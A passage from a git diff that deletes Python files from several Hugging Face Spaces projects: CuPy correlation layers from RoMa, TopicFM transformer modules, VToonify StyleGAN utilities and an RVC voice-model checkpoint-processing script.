- args=[n, rbot0.data_ptr(), rbot1.data_ptr(), output.data_ptr()],
- stream=Stream,
- )
-
- elif first.is_cuda == False:
- raise NotImplementedError()
-
- return output
-
- @staticmethod
- def backward(self, gradOutput):
- first, second, rbot0, rbot1 = self.saved_tensors
-
- gradOutput = gradOutput.contiguous()
-
- assert gradOutput.is_contiguous() == True
-
- gradFirst = (
- first.new_zeros(
- [first.size(0), first.size(1), first.size(2), first.size(3)]
- )
- if self.needs_input_grad[0] == True
- else None
- )
- gradSecond = (
- first.new_zeros(
- [first.size(0), first.size(1), first.size(2), first.size(3)]
- )
- if self.needs_input_grad[1] == True
- else None
- )
-
- if first.is_cuda == True:
- if gradFirst is not None:
- for intSample in range(first.size(0)):
- n = first.size(1) * first.size(2) * first.size(3)
- cupy_launch(
- "kernel_Correlation_updateGradFirst",
- cupy_kernel(
- "kernel_Correlation_updateGradFirst",
- {
- "rbot0": rbot0,
- "rbot1": rbot1,
- "gradOutput": gradOutput,
- "gradFirst": gradFirst,
- "gradSecond": None,
- },
- ),
- )(
- grid=tuple([int((n + 512 - 1) / 512), 1, 1]),
- block=tuple([512, 1, 1]),
- args=[
- n,
- intSample,
- rbot0.data_ptr(),
- rbot1.data_ptr(),
- gradOutput.data_ptr(),
- gradFirst.data_ptr(),
- None,
- ],
- stream=Stream,
- )
-
- if gradSecond is not None:
- for intSample in range(first.size(0)):
- n = first.size(1) * first.size(2) * first.size(3)
- cupy_launch(
- "kernel_Correlation_updateGradSecond",
- cupy_kernel(
- "kernel_Correlation_updateGradSecond",
- {
- "rbot0": rbot0,
- "rbot1": rbot1,
- "gradOutput": gradOutput,
- "gradFirst": None,
- "gradSecond": gradSecond,
- },
- ),
- )(
- grid=tuple([int((n + 512 - 1) / 512), 1, 1]),
- block=tuple([512, 1, 1]),
- args=[
- n,
- intSample,
- rbot0.data_ptr(),
- rbot1.data_ptr(),
- gradOutput.data_ptr(),
- None,
- gradSecond.data_ptr(),
- ],
- stream=Stream,
- )
-
- elif first.is_cuda == False:
- raise NotImplementedError()
-
- return gradFirst, gradSecond
-
-
-class _FunctionCorrelationTranspose(torch.autograd.Function):
- @staticmethod
- def forward(self, input, second):
- rbot0 = second.new_zeros(
- [second.size(0), second.size(2) + 8, second.size(3) + 8, second.size(1)]
- )
- rbot1 = second.new_zeros(
- [second.size(0), second.size(2) + 8, second.size(3) + 8, second.size(1)]
- )
-
- self.save_for_backward(input, second, rbot0, rbot1)
-
- input = input.contiguous()
- second = second.contiguous()
-
- output = second.new_zeros(
- [second.size(0), second.size(1), second.size(2), second.size(3)]
- )
-
- if second.is_cuda == True:
- n = second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_rearrange",
- cupy_kernel(
- "kernel_Correlation_rearrange", {"input": second, "output": rbot1}
- ),
- )(
- grid=tuple([int((n + 16 - 1) / 16), second.size(1), second.size(0)]),
- block=tuple([16, 1, 1]),
- args=[n, second.data_ptr(), rbot1.data_ptr()],
- stream=Stream,
- )
-
- for intSample in range(second.size(0)):
- n = second.size(1) * second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_updateGradFirst",
- cupy_kernel(
- "kernel_Correlation_updateGradFirst",
- {
- "rbot0": rbot0,
- "rbot1": rbot1,
- "gradOutput": input,
- "gradFirst": output,
- "gradSecond": None,
- },
- ),
- )(
- grid=tuple([int((n + 512 - 1) / 512), 1, 1]),
- block=tuple([512, 1, 1]),
- args=[
- n,
- intSample,
- rbot0.data_ptr(),
- rbot1.data_ptr(),
- input.data_ptr(),
- output.data_ptr(),
- None,
- ],
- stream=Stream,
- )
-
- elif second.is_cuda == False:
- raise NotImplementedError()
-
- return output
-
- @staticmethod
- def backward(self, gradOutput):
- input, second, rbot0, rbot1 = self.saved_tensors
-
- gradOutput = gradOutput.contiguous()
-
- gradInput = (
- input.new_zeros(
- [input.size(0), input.size(1), input.size(2), input.size(3)]
- )
- if self.needs_input_grad[0] == True
- else None
- )
- gradSecond = (
- second.new_zeros(
- [second.size(0), second.size(1), second.size(2), second.size(3)]
- )
- if self.needs_input_grad[1] == True
- else None
- )
-
- if second.is_cuda == True:
- if gradInput is not None or gradSecond is not None:
- n = second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_rearrange",
- cupy_kernel(
- "kernel_Correlation_rearrange",
- {"input": gradOutput, "output": rbot0},
- ),
- )(
- grid=tuple(
- [int((n + 16 - 1) / 16), gradOutput.size(1), gradOutput.size(0)]
- ),
- block=tuple([16, 1, 1]),
- args=[n, gradOutput.data_ptr(), rbot0.data_ptr()],
- stream=Stream,
- )
-
- if gradInput is not None:
- n = gradInput.size(1) * gradInput.size(2) * gradInput.size(3)
- cupy_launch(
- "kernel_Correlation_updateOutput",
- cupy_kernel(
- "kernel_Correlation_updateOutput",
- {"rbot0": rbot0, "rbot1": rbot1, "top": gradInput},
- ),
- )(
- grid=tuple(
- [gradInput.size(3), gradInput.size(2), gradInput.size(0)]
- ),
- block=tuple([32, 1, 1]),
- shared_mem=gradOutput.size(1) * 4,
- args=[n, rbot0.data_ptr(), rbot1.data_ptr(), gradInput.data_ptr()],
- stream=Stream,
- )
-
- if gradSecond is not None:
- for intSample in range(second.size(0)):
- n = second.size(1) * second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_updateGradSecond",
- cupy_kernel(
- "kernel_Correlation_updateGradSecond",
- {
- "rbot0": rbot0,
- "rbot1": rbot1,
- "gradOutput": input,
- "gradFirst": None,
- "gradSecond": gradSecond,
- },
- ),
- )(
- grid=tuple([int((n + 512 - 1) / 512), 1, 1]),
- block=tuple([512, 1, 1]),
- args=[
- n,
- intSample,
- rbot0.data_ptr(),
- rbot1.data_ptr(),
- input.data_ptr(),
- None,
- gradSecond.data_ptr(),
- ],
- stream=Stream,
- )
-
- elif second.is_cuda == False:
- raise NotImplementedError()
-
- return gradInput, gradSecond
-
-
-def FunctionCorrelation(reference_features, query_features):
- return _FunctionCorrelation.apply(reference_features, query_features)
-
-
-class ModuleCorrelation(torch.nn.Module):
- def __init__(self):
- super(ModuleCorrelation, self).__init__()
-
- def forward(self, tensorFirst, tensorSecond):
- return _FunctionCorrelation.apply(tensorFirst, tensorSecond)
-
-
-def FunctionCorrelationTranspose(reference_features, query_features):
- return _FunctionCorrelationTranspose.apply(reference_features, query_features)
-
-
-class ModuleCorrelationTranspose(torch.nn.Module):
- def __init__(self):
- super(ModuleCorrelationTranspose, self).__init__()
-
- def forward(self, tensorFirst, tensorSecond):
- return _FunctionCorrelationTranspose.apply(tensorFirst, tensorSecond)
-
-
-class LocalCorr(ConvRefiner):
- def forward(self, x, y, flow):
- """Computes the relative refining displacement in pixels for a given image x,y and a coarse flow-field between them
-
- Args:
- x ([type]): [description]
- y ([type]): [description]
- flow ([type]): [description]
-
- Returns:
- [type]: [description]
- """
- with torch.no_grad():
- x_hat = F.grid_sample(y, flow.permute(0, 2, 3, 1), align_corners=False)
- corr = FunctionCorrelation(x, x_hat)
- d = self.block1(corr)
- d = self.hidden_blocks(d)
- d = self.out_conv(d)
- certainty, displacement = d[:, :-2], d[:, -2:]
- return certainty, displacement
-
-
-if __name__ == "__main__":
- device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
- x = torch.randn(2, 128, 32, 32).to(device)
- y = torch.randn(2, 128, 32, 32).to(device)
- local_corr = LocalCorr(in_dim=81, hidden_dim=81 * 4)
- z = local_corr(x, y)
- print("hej")
diff --git a/spaces/Realcat/image-matching-webui/third_party/Roma/roma/models/__init__.py b/spaces/Realcat/image-matching-webui/third_party/Roma/roma/models/__init__.py
deleted file mode 100644
index 3918d67063b9ab7a8ced80c22a5e74f95ff7fd4a..0000000000000000000000000000000000000000
--- a/spaces/Realcat/image-matching-webui/third_party/Roma/roma/models/__init__.py
+++ /dev/null
@@ -1 +0,0 @@
-from .model_zoo import roma_outdoor, roma_indoor
diff --git a/spaces/Realcat/image-matching-webui/third_party/TopicFM/src/models/modules/transformer.py b/spaces/Realcat/image-matching-webui/third_party/TopicFM/src/models/modules/transformer.py
deleted file mode 100644
index cef17ca689cd0f844c1d6bd6c0f987a3e0c3be59..0000000000000000000000000000000000000000
--- a/spaces/Realcat/image-matching-webui/third_party/TopicFM/src/models/modules/transformer.py
+++ /dev/null
@@ -1,294 +0,0 @@
-from loguru import logger
-import copy
-import torch
-import torch.nn as nn
-import torch.nn.functional as F
-
-from .linear_attention import LinearAttention, FullAttention
-
-
-class LoFTREncoderLayer(nn.Module):
- def __init__(self, d_model, nhead, attention="linear"):
- super(LoFTREncoderLayer, self).__init__()
-
- self.dim = d_model // nhead
- self.nhead = nhead
-
- # multi-head attention
- self.q_proj = nn.Linear(d_model, d_model, bias=False)
- self.k_proj = nn.Linear(d_model, d_model, bias=False)
- self.v_proj = nn.Linear(d_model, d_model, bias=False)
- self.attention = LinearAttention() if attention == "linear" else FullAttention()
- self.merge = nn.Linear(d_model, d_model, bias=False)
-
- # feed-forward network
- self.mlp = nn.Sequential(
- nn.Linear(d_model * 2, d_model * 2, bias=False),
- nn.GELU(),
- nn.Linear(d_model * 2, d_model, bias=False),
- )
-
- # norm and dropout
- self.norm1 = nn.LayerNorm(d_model)
- self.norm2 = nn.LayerNorm(d_model)
-
- def forward(self, x, source, x_mask=None, source_mask=None):
- """
- Args:
- x (torch.Tensor): [N, L, C]
- source (torch.Tensor): [N, S, C]
- x_mask (torch.Tensor): [N, L] (optional)
- source_mask (torch.Tensor): [N, S] (optional)
- """
- bs = x.shape[0]
- query, key, value = x, source, source
-
- # multi-head attention
- query = self.q_proj(query).view(bs, -1, self.nhead, self.dim) # [N, L, (H, D)]
- key = self.k_proj(key).view(bs, -1, self.nhead, self.dim) # [N, S, (H, D)]
- value = self.v_proj(value).view(bs, -1, self.nhead, self.dim)
- message = self.attention(
- query, key, value, q_mask=x_mask, kv_mask=source_mask
- ) # [N, L, (H, D)]
- message = self.merge(message.view(bs, -1, self.nhead * self.dim)) # [N, L, C]
- message = self.norm1(message)
-
- # feed-forward network
- message = self.mlp(torch.cat([x, message], dim=2))
- message = self.norm2(message)
-
- return x + message
-
-
-class TopicFormer(nn.Module):
- """A Local Feature Transformer (LoFTR) module."""
-
- def __init__(self, config):
- super(TopicFormer, self).__init__()
-
- self.config = config
- self.d_model = config["d_model"]
- self.nhead = config["nhead"]
- self.layer_names = config["layer_names"]
- encoder_layer = LoFTREncoderLayer(
- config["d_model"], config["nhead"], config["attention"]
- )
- self.layers = nn.ModuleList(
- [copy.deepcopy(encoder_layer) for _ in range(len(self.layer_names))]
- )
-
- self.topic_transformers = (
- nn.ModuleList(
- [
- copy.deepcopy(encoder_layer)
- for _ in range(2 * config["n_topic_transformers"])
- ]
- )
- if config["n_samples"] > 0
- else None
- ) # nn.ModuleList([copy.deepcopy(encoder_layer) for _ in range(2)])
- self.n_iter_topic_transformer = config["n_topic_transformers"]
-
- self.seed_tokens = nn.Parameter(
- torch.randn(config["n_topics"], config["d_model"])
- )
- self.register_parameter("seed_tokens", self.seed_tokens)
- self.n_samples = config["n_samples"]
-
- self._reset_parameters()
-
- def _reset_parameters(self):
- for p in self.parameters():
- if p.dim() > 1:
- nn.init.xavier_uniform_(p)
-
- def sample_topic(self, prob_topics, topics, L):
- """
- Args:
- topics (torch.Tensor): [N, L+S, K]
- """
- prob_topics0, prob_topics1 = prob_topics[:, :L], prob_topics[:, L:]
- topics0, topics1 = topics[:, :L], topics[:, L:]
-
- theta0 = F.normalize(prob_topics0.sum(dim=1), p=1, dim=-1) # [N, K]
- theta1 = F.normalize(prob_topics1.sum(dim=1), p=1, dim=-1)
- theta = F.normalize(theta0 * theta1, p=1, dim=-1)
- if self.n_samples == 0:
- return None
- if self.training:
- sampled_inds = torch.multinomial(theta, self.n_samples)
- sampled_values = torch.gather(theta, dim=-1, index=sampled_inds)
- else:
- sampled_values, sampled_inds = torch.topk(theta, self.n_samples, dim=-1)
- sampled_topics0 = torch.gather(
- topics0,
- dim=-1,
- index=sampled_inds.unsqueeze(1).repeat(1, topics0.shape[1], 1),
- )
- sampled_topics1 = torch.gather(
- topics1,
- dim=-1,
- index=sampled_inds.unsqueeze(1).repeat(1, topics1.shape[1], 1),
- )
- return sampled_topics0, sampled_topics1
-
- def reduce_feat(self, feat, topick, N, C):
- len_topic = topick.sum(dim=-1).int()
- max_len = len_topic.max().item()
- selected_ids = topick.bool()
- resized_feat = torch.zeros(
- (N, max_len, C), dtype=torch.float32, device=feat.device
- )
- new_mask = torch.zeros_like(resized_feat[..., 0]).bool()
- for i in range(N):
- new_mask[i, : len_topic[i]] = True
- resized_feat[new_mask, :] = feat[selected_ids, :]
- return resized_feat, new_mask, selected_ids
-
- def forward(self, feat0, feat1, mask0=None, mask1=None):
- """
- Args:
- feat0 (torch.Tensor): [N, L, C]
- feat1 (torch.Tensor): [N, S, C]
- mask0 (torch.Tensor): [N, L] (optional)
- mask1 (torch.Tensor): [N, S] (optional)
- """
-
- assert (
- self.d_model == feat0.shape[2]
- ), "the feature number of src and transformer must be equal"
- N, L, S, C, K = (
- feat0.shape[0],
- feat0.shape[1],
- feat1.shape[1],
- feat0.shape[2],
- self.config["n_topics"],
- )
-
- seeds = self.seed_tokens.unsqueeze(0).repeat(N, 1, 1)
-
- feat = torch.cat((feat0, feat1), dim=1)
- if mask0 is not None:
- mask = torch.cat((mask0, mask1), dim=-1)
- else:
- mask = None
-
- for layer, name in zip(self.layers, self.layer_names):
- if name == "seed":
- # seeds = layer(seeds, feat0, None, mask0)
- # seeds = layer(seeds, feat1, None, mask1)
- seeds = layer(seeds, feat, None, mask)
- elif name == "feat":
- feat0 = layer(feat0, seeds, mask0, None)
- feat1 = layer(feat1, seeds, mask1, None)
-
- dmatrix = torch.einsum("nmd,nkd->nmk", feat, seeds)
- prob_topics = F.softmax(dmatrix, dim=-1)
-
- feat_topics = torch.zeros_like(dmatrix).scatter_(
- -1, torch.argmax(dmatrix, dim=-1, keepdim=True), 1.0
- )
-
- if mask is not None:
- feat_topics = feat_topics * mask.unsqueeze(-1)
- prob_topics = prob_topics * mask.unsqueeze(-1)
-
- if (feat_topics.detach().sum(dim=1).sum(dim=0) > 100).sum() <= 3:
- logger.warning("topic distribution is highly sparse!")
- sampled_topics = self.sample_topic(prob_topics.detach(), feat_topics, L)
- if sampled_topics is not None:
- updated_feat0, updated_feat1 = torch.zeros_like(feat0), torch.zeros_like(
- feat1
- )
- s_topics0, s_topics1 = sampled_topics
- for k in range(s_topics0.shape[-1]):
- topick0, topick1 = s_topics0[..., k], s_topics1[..., k] # [N, L+S]
- if (topick0.sum() > 0) and (topick1.sum() > 0):
- new_feat0, new_mask0, selected_ids0 = self.reduce_feat(
- feat0, topick0, N, C
- )
- new_feat1, new_mask1, selected_ids1 = self.reduce_feat(
- feat1, topick1, N, C
- )
- for idt in range(self.n_iter_topic_transformer):
- new_feat0 = self.topic_transformers[idt * 2](
- new_feat0, new_feat0, new_mask0, new_mask0
- )
- new_feat1 = self.topic_transformers[idt * 2](
- new_feat1, new_feat1, new_mask1, new_mask1
- )
- new_feat0 = self.topic_transformers[idt * 2 + 1](
- new_feat0, new_feat1, new_mask0, new_mask1
- )
- new_feat1 = self.topic_transformers[idt * 2 + 1](
- new_feat1, new_feat0, new_mask1, new_mask0
- )
- updated_feat0[selected_ids0, :] = new_feat0[new_mask0, :]
- updated_feat1[selected_ids1, :] = new_feat1[new_mask1, :]
-
- feat0 = (1 - s_topics0.sum(dim=-1, keepdim=True)) * feat0 + updated_feat0
- feat1 = (1 - s_topics1.sum(dim=-1, keepdim=True)) * feat1 + updated_feat1
-
- conf_matrix = (
- torch.einsum("nlc,nsc->nls", feat0, feat1) / C**0.5
- ) # (C * temperature)
- if self.training:
- topic_matrix = torch.einsum(
- "nlk,nsk->nls", prob_topics[:, :L], prob_topics[:, L:]
- )
- outlier_mask = torch.einsum(
- "nlk,nsk->nls", feat_topics[:, :L], feat_topics[:, L:]
- )
- else:
- topic_matrix = {"img0": feat_topics[:, :L], "img1": feat_topics[:, L:]}
- outlier_mask = torch.ones_like(conf_matrix)
- if mask0 is not None:
- outlier_mask = outlier_mask * mask0[..., None] * mask1[:, None] # .bool()
- conf_matrix.masked_fill_(~outlier_mask.bool(), -1e9)
- conf_matrix = F.softmax(conf_matrix, 1) * F.softmax(
- conf_matrix, 2
- ) # * topic_matrix
-
- return feat0, feat1, conf_matrix, topic_matrix
-
-
-class LocalFeatureTransformer(nn.Module):
- """A Local Feature Transformer (LoFTR) module."""
-
- def __init__(self, config):
- super(LocalFeatureTransformer, self).__init__()
-
- self.config = config
- self.d_model = config["d_model"]
- self.nhead = config["nhead"]
- self.layer_names = config["layer_names"]
- encoder_layer = LoFTREncoderLayer(
- config["d_model"], config["nhead"], config["attention"]
- )
- self.layers = nn.ModuleList(
- [copy.deepcopy(encoder_layer) for _ in range(2)]
- ) # len(self.layer_names))])
- self._reset_parameters()
-
- def _reset_parameters(self):
- for p in self.parameters():
- if p.dim() > 1:
- nn.init.xavier_uniform_(p)
-
- def forward(self, feat0, feat1, mask0=None, mask1=None):
- """
- Args:
- feat0 (torch.Tensor): [N, L, C]
- feat1 (torch.Tensor): [N, S, C]
- mask0 (torch.Tensor): [N, L] (optional)
- mask1 (torch.Tensor): [N, S] (optional)
- """
-
- assert (
- self.d_model == feat0.shape[2]
- ), "the feature number of src and transformer must be equal"
-
- feat0 = self.layers[0](feat0, feat1, mask0, mask1)
- feat1 = self.layers[1](feat1, feat0, mask1, mask0)
-
- return feat0, feat1
diff --git a/spaces/Reha2704/VToonify/vtoonify/util.py b/spaces/Reha2704/VToonify/vtoonify/util.py
deleted file mode 100644
index 01ad2930c55d07866dee02e019d359bb78f65fc7..0000000000000000000000000000000000000000
--- a/spaces/Reha2704/VToonify/vtoonify/util.py
+++ /dev/null
@@ -1,229 +0,0 @@
-import numpy as np
-import matplotlib.pyplot as plt
-from PIL import Image
-import cv2
-import random
-import math
-import argparse
-import torch
-from torch.utils import data
-from torch.nn import functional as F
-from torch import autograd
-from torch.nn import init
-import torchvision.transforms as transforms
-from model.stylegan.op import conv2d_gradfix
-from model.encoder.encoders.psp_encoders import GradualStyleEncoder
-from model.encoder.align_all_parallel import get_landmark
-
-def visualize(img_arr, dpi):
- plt.figure(figsize=(10,10),dpi=dpi)
- plt.imshow(((img_arr.detach().cpu().numpy().transpose(1, 2, 0) + 1.0) * 127.5).astype(np.uint8))
- plt.axis('off')
- plt.show()
-
-def save_image(img, filename):
- tmp = ((img.detach().cpu().numpy().transpose(1, 2, 0) + 1.0) * 127.5).astype(np.uint8)
- cv2.imwrite(filename, cv2.cvtColor(tmp, cv2.COLOR_RGB2BGR))
-
-def load_image(filename):
- transform = transforms.Compose([
- transforms.ToTensor(),
- transforms.Normalize(mean=[0.5, 0.5, 0.5],std=[0.5,0.5,0.5]),
- ])
-
- img = Image.open(filename)
- img = transform(img)
- return img.unsqueeze(dim=0)
-
-def data_sampler(dataset, shuffle, distributed):
- if distributed:
- return data.distributed.DistributedSampler(dataset, shuffle=shuffle)
-
- if shuffle:
- return data.RandomSampler(dataset)
-
- else:
- return data.SequentialSampler(dataset)
-
-
-def requires_grad(model, flag=True):
- for p in model.parameters():
- p.requires_grad = flag
-
-
-def accumulate(model1, model2, decay=0.999):
- par1 = dict(model1.named_parameters())
- par2 = dict(model2.named_parameters())
-
- for k in par1.keys():
- par1[k].data.mul_(decay).add_(par2[k].data, alpha=1 - decay)
-
-
-def sample_data(loader):
- while True:
- for batch in loader:
- yield batch
-
-
-def d_logistic_loss(real_pred, fake_pred):
- real_loss = F.softplus(-real_pred)
- fake_loss = F.softplus(fake_pred)
-
- return real_loss.mean() + fake_loss.mean()
-
-
-def d_r1_loss(real_pred, real_img):
- with conv2d_gradfix.no_weight_gradients():
- grad_real, = autograd.grad(
- outputs=real_pred.sum(), inputs=real_img, create_graph=True
- )
- grad_penalty = grad_real.pow(2).reshape(grad_real.shape[0], -1).sum(1).mean()
-
- return grad_penalty
-
-
-def g_nonsaturating_loss(fake_pred):
- loss = F.softplus(-fake_pred).mean()
-
- return loss
-
-
-def g_path_regularize(fake_img, latents, mean_path_length, decay=0.01):
- noise = torch.randn_like(fake_img) / math.sqrt(
- fake_img.shape[2] * fake_img.shape[3]
- )
- grad, = autograd.grad(
- outputs=(fake_img * noise).sum(), inputs=latents, create_graph=True
- )
- path_lengths = torch.sqrt(grad.pow(2).sum(2).mean(1))
-
- path_mean = mean_path_length + decay * (path_lengths.mean() - mean_path_length)
-
- path_penalty = (path_lengths - path_mean).pow(2).mean()
-
- return path_penalty, path_mean.detach(), path_lengths
-
-
-def make_noise(batch, latent_dim, n_noise, device):
- if n_noise == 1:
- return torch.randn(batch, latent_dim, device=device)
-
- noises = torch.randn(n_noise, batch, latent_dim, device=device).unbind(0)
-
- return noises
-
-
-def mixing_noise(batch, latent_dim, prob, device):
- if prob > 0 and random.random() < prob:
- return make_noise(batch, latent_dim, 2, device)
-
- else:
- return [make_noise(batch, latent_dim, 1, device)]
-
-
-def set_grad_none(model, targets):
- for n, p in model.named_parameters():
- if n in targets:
- p.grad = None
-
-
-def weights_init(m):
- classname = m.__class__.__name__
- if classname.find('BatchNorm2d') != -1:
- if hasattr(m, 'weight') and m.weight is not None:
- init.normal_(m.weight.data, 1.0, 0.02)
- if hasattr(m, 'bias') and m.bias is not None:
- init.constant_(m.bias.data, 0.0)
- elif hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
- init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
- if hasattr(m, 'bias') and m.bias is not None:
- init.constant_(m.bias.data, 0.0)
-
-
-def load_psp_standalone(checkpoint_path, device='cuda'):
- ckpt = torch.load(checkpoint_path, map_location='cpu')
- opts = ckpt['opts']
- if 'output_size' not in opts:
- opts['output_size'] = 1024
- opts['n_styles'] = int(math.log(opts['output_size'], 2)) * 2 - 2
- opts = argparse.Namespace(**opts)
- psp = GradualStyleEncoder(50, 'ir_se', opts)
- psp_dict = {k.replace('encoder.', ''): v for k, v in ckpt['state_dict'].items() if k.startswith('encoder.')}
- psp.load_state_dict(psp_dict)
- psp.eval()
- psp = psp.to(device)
- latent_avg = ckpt['latent_avg'].to(device)
-
- def add_latent_avg(model, inputs, outputs):
- return outputs + latent_avg.repeat(outputs.shape[0], 1, 1)
-
- psp.register_forward_hook(add_latent_avg)
- return psp
-
-def get_video_crop_parameter(filepath, predictor, padding=[200,200,200,200]):
- if type(filepath) == str:
- img = dlib.load_rgb_image(filepath)
- else:
- img = filepath
- lm = get_landmark(img, predictor)
- if lm is None:
- return None
- lm_chin = lm[0 : 17] # left-right
- lm_eyebrow_left = lm[17 : 22] # left-right
- lm_eyebrow_right = lm[22 : 27] # left-right
- lm_nose = lm[27 : 31] # top-down
- lm_nostrils = lm[31 : 36] # top-down
- lm_eye_left = lm[36 : 42] # left-clockwise
- lm_eye_right = lm[42 : 48] # left-clockwise
- lm_mouth_outer = lm[48 : 60] # left-clockwise
- lm_mouth_inner = lm[60 : 68] # left-clockwise
-
- scale = 64. / (np.mean(lm_eye_right[:,0])-np.mean(lm_eye_left[:,0]))
- center = ((np.mean(lm_eye_right, axis=0)+np.mean(lm_eye_left, axis=0)) / 2) * scale
- h, w = round(img.shape[0] * scale), round(img.shape[1] * scale)
- left = max(round(center[0] - padding[0]), 0) // 8 * 8
- right = min(round(center[0] + padding[1]), w) // 8 * 8
- top = max(round(center[1] - padding[2]), 0) // 8 * 8
- bottom = min(round(center[1] + padding[3]), h) // 8 * 8
- return h,w,top,bottom,left,right,scale
-
-def tensor2cv2(img):
- tmp = ((img.cpu().numpy().transpose(1, 2, 0) + 1.0) * 127.5).astype(np.uint8)
- return cv2.cvtColor(tmp, cv2.COLOR_RGB2BGR)
-
-# get parameters from the stylegan and mark them with their layers
-def gather_params(G):
- params = dict(
- [(res, {}) for res in range(18)] + [("others", {})]
- )
- for n, p in sorted(list(G.named_buffers()) + list(G.named_parameters())):
- if n.startswith("convs"):
- layer = int(n.split(".")[1]) + 1
- params[layer][n] = p
- elif n.startswith("to_rgbs"):
- layer = int(n.split(".")[1]) * 2 + 3
- params[layer][n] = p
- elif n.startswith("conv1"):
- params[0][n] = p
- elif n.startswith("to_rgb1"):
- params[1][n] = p
- else:
- params["others"][n] = p
- return params
-
-# blend the ffhq stylegan model and the finetuned model for toonify
-# see ``Resolution Dependent GAN Interpolation for Controllable Image Synthesis Between Domains''
-def blend_models(G_low, G_high, weight=[1]*7+[0]*11):
- params_low = gather_params(G_low)
- params_high = gather_params(G_high)
-
- for res in range(18):
- for n, p in params_high[res].items():
- params_high[res][n] = params_high[res][n] * (1-weight[res]) + params_low[res][n] * weight[res]
-
- state_dict = {}
- for _, p in params_high.items():
- state_dict.update(p)
-
- return state_dict
-
diff --git a/spaces/Ricecake123/RVC-demo/train/process_ckpt.py b/spaces/Ricecake123/RVC-demo/train/process_ckpt.py
deleted file mode 100644
index 8f9c3d74d6a73a2d0a6a6bc9a592bea01e1c820e..0000000000000000000000000000000000000000
--- a/spaces/Ricecake123/RVC-demo/train/process_ckpt.py
+++ /dev/null
@@ -1,259 +0,0 @@
-import torch, traceback, os, pdb, sys
-
-now_dir = os.getcwd()
-sys.path.append(now_dir)
-from collections import OrderedDict
-from i18n import I18nAuto
-
-i18n = I18nAuto()
-
-
-def savee(ckpt, sr, if_f0, name, epoch, version, hps):
- try:
- opt = OrderedDict()
- opt["weight"] = {}
- for key in ckpt.keys():
- if "enc_q" in key:
- continue
- opt["weight"][key] = ckpt[key].half()
- opt["config"] = [
- hps.data.filter_length // 2 + 1,
- 32,
- hps.model.inter_channels,
- hps.model.hidden_channels,
- hps.model.filter_channels,
- hps.model.n_heads,
- hps.model.n_layers,
- hps.model.kernel_size,
- hps.model.p_dropout,
- hps.model.resblock,
- hps.model.resblock_kernel_sizes,
- hps.model.resblock_dilation_sizes,
- hps.model.upsample_rates,
- hps.model.upsample_initial_channel,
- hps.model.upsample_kernel_sizes,
- hps.model.spk_embed_dim,
- hps.model.gin_channels,
- hps.data.sampling_rate,
- ]
- opt["info"] = "%sepoch" % epoch
- opt["sr"] = sr
- opt["f0"] = if_f0
- opt["version"] = version
- torch.save(opt, "weights/%s.pth" % name)
- return "Success."
- except:
- return traceback.format_exc()
-
-
-def show_info(path):
- try:
- a = torch.load(path, map_location="cpu")
- return "模型信息:%s\n采样率:%s\n模型是否输入音高引导:%s\n版本:%s" % (
- a.get("info", "None"),
- a.get("sr", "None"),
- a.get("f0", "None"),
- a.get("version", "None"),
- )
- except:
- return traceback.format_exc()
-
-
-def extract_small_model(path, name, sr, if_f0, info, version):
- try:
- ckpt = torch.load(path, map_location="cpu")
- if "model" in ckpt:
- ckpt = ckpt["model"]
- opt = OrderedDict()
- opt["weight"] = {}
- for key in ckpt.keys():
- if "enc_q" in key:
- continue
- opt["weight"][key] = ckpt[key].half()
- if sr == "40k":
- opt["config"] = [
- 1025,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [10, 10, 2, 2],
- 512,
- [16, 16, 4, 4],
- 109,
- 256,
- 40000,
- ]
- elif sr == "48k":
- if version == "v1":
- opt["config"] = [
- 1025,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [10, 6, 2, 2, 2],
- 512,
- [16, 16, 4, 4, 4],
- 109,
- 256,
- 48000,
- ]
- else:
- opt["config"] = [
- 1025,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [12, 10, 2, 2],
- 512,
- [24, 20, 4, 4],
- 109,
- 256,
- 48000,
- ]
- elif sr == "32k":
- if version == "v1":
- opt["config"] = [
- 513,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [10, 4, 2, 2, 2],
- 512,
- [16, 16, 4, 4, 4],
- 109,
- 256,
- 32000,
- ]
- else:
- opt["config"] = [
- 513,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [10, 8, 2, 2],
- 512,
- [20, 16, 4, 4],
- 109,
- 256,
- 32000,
- ]
- if info == "":
- info = "Extracted model."
- opt["info"] = info
- opt["version"] = version
- opt["sr"] = sr
- opt["f0"] = int(if_f0)
- torch.save(opt, "weights/%s.pth" % name)
- return "Success."
- except:
- return traceback.format_exc()
-
-
-def change_info(path, info, name):
- try:
- ckpt = torch.load(path, map_location="cpu")
- ckpt["info"] = info
- if name == "":
- name = os.path.basename(path)
- torch.save(ckpt, "weights/%s" % name)
- return "Success."
- except:
- return traceback.format_exc()
-
-
-def merge(path1, path2, alpha1, sr, f0, info, name, version):
- try:
-
- def extract(ckpt):
- a = ckpt["model"]
- opt = OrderedDict()
- opt["weight"] = {}
- for key in a.keys():
- if "enc_q" in key:
- continue
- opt["weight"][key] = a[key]
- return opt
-
- ckpt1 = torch.load(path1, map_location="cpu")
- ckpt2 = torch.load(path2, map_location="cpu")
- cfg = ckpt1["config"]
- if "model" in ckpt1:
- ckpt1 = extract(ckpt1)
- else:
- ckpt1 = ckpt1["weight"]
- if "model" in ckpt2:
- ckpt2 = extract(ckpt2)
- else:
- ckpt2 = ckpt2["weight"]
